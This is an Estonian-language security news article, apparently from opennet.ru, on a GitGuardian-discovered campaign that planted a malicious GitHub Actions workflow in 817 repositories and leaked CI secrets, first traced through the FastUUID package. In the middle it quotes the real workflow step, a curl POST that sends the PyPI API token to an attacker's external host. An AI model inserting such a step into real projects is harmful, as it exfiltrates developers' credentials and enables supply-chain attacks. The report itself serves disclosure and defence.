GitGuardiani teadlased on avastanud ulatusliku rĂŒnnaku GitHubi kasutajate vastu, mille kĂ€igus sai kontrolli alla 327 kontot ning pahatahtlik Github Action töötleja lisati 817 hoidlasse. RĂŒnnak tĂ”i kaasa 3325 saladuse lekkimise, mis olid kasutusel pideva integreerimise sĂŒsteemides ja edastatud keskkonna muutujate kaudu, sealhulgas PyPI, GitHub, NPM, DockerHub ja erinevate pilvelahenduste juurdepÀÀsutokenid.

GitHub Actions vĂ”imaldab arendajatel kinnitada töötlejat erinevate operatsioonide automatiseerimiseks GitHubis. NĂ€iteks saab GitHub Actions abil teostada teatud kontrolle ja testide lĂ€biviimisi commitide tegemisel vĂ”i automatiseerida uute Issues'i töötlemist. Pahatahtlik töötleja levitati nime all âGithub Actions Securityâ ja sisaldas ârunâ sektsioonis kĂ€sku âcurlâ, mis edastas keskkonna muutujate sisu vĂ€lisele hostile pideva integreerimise keskkonnas ĂŒlesannete kĂ€ivitamisel. Pahatahtlik commit lisati projektide haldurite kontode kaudu, mis tĂ”enĂ€oliselt olid varem hĂ€kitud vĂ”i said kalastamise ohvriks.
RĂŒnnak avati pĂ€rast anomaalse tegevuse uurimist, mis oli seotud FastUUID paketiga, mis pakub Python'i sidet Rust'i UUID teegi ĂŒle. FastUUID paketti, millele on viimase nĂ€dala jooksul tehtud peaaegu 1,2 miljonit allalaadimist, kasutatakse sĂ”ltuvusena populaarsetes projektides nagu LiteLLM, millel on PyPI-s ĂŒle 5 miljoni nĂ€dalased allalaadimist. AnalĂŒĂŒs FastUUID hoidla muudatustest nĂ€itas, et 2. septembril lisas projekti haldur commit'i uue Github Action töötlejaga, mis sisaldas koodi, mis edastas tokeni PyPI hoidlasse vĂ€lisele hostile. â name: Github Actions Security run: | curl -s -X POST -d âPYPI_API_TOKEN=${{ secrets.PYPI_API_TOKEN }}â https://bold-dhawan.45-139-104-115.plesk.page
Probleem Ă”nnestus tuvastada enne, kui kurjategijad kasutasid ĂŒlevĂ”etud tokenit â PyPI-s ei ole registreeritud kahjulike muudatuste vĂ”i muudetud versioonide avaldamist FastUUID jaoks. Sarnased asendused Github Action tuvastati veel 816 hoidlas, mille omanikele ning PyPI, GitHub, NPM ja DockerHubi administratsioonile saadeti teated. Eilse Ă”htu seisuga olid kahjulikud commid umbes 100 hoidlas tagasi vĂ”etud. Praegu tuvastatakse GitHubis 671 kahjuliku Github Action commiti.
Allikas: opennet.ru
